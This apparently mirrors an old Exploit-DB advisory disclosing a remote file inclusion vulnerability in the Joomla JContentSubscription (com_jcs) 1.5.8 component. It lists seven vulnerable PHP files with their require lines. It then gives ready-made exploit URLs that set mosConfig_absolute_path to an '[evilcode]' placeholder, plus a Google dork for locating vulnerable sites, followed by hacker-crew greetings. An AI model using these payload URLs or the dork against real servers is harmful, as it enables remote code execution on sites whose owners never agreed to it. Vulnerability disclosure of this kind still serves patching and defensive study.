- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4508
- Проверка EDB
-
- Пройдено
- Автор
- NOGE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-5407
- Дата публикации
- 2007-10-10
Код:
# JContentSubscription Joomla Component 1.5.8 Multiply Remote File Include Vulnerability
Component : com_jcs version 1.5.8 - payable component
Dicovered by : NoGe
Contact : [email protected]
==================================================================================================================================
# Vulnerable file
/administrator/components/com_jcs/jcs.function.php
line 6 require_once( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
/administrator/components/com_jcs/view/add.php
line 7 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
/administrator/components/com_jcs/view/history.php
line 7 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
/administrator/components/com_jcs/view/register.php
line 6 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
/administrator/components/com_jcs/views/list.sub.html.php
line 3 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );
/administrator/components/com_jcs/views/list.user.sub.html.php
line 7 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );
/administrator/components/com_jcs/views/reports.html.php
line 3 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );
# Exploit
http://localhost/path/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=[evilcode]
# Google dork
inurl:com_jcs
==================================================================================================================================
# Greetz
all crew #papuahacker #baliemhackerlink #nyubicrew
skulmatic olibekas ulga Cungkee nyubi k1tk4t newbie str0ke
yooogy H312Y Vaksin13 Oon_Boy Paman mousekill }^-^{ haliq
http://kapukvalley.net member
==================================================================================================================================
# milw0rm.com [2007-10-10]- Источник
- www.exploit-db.com
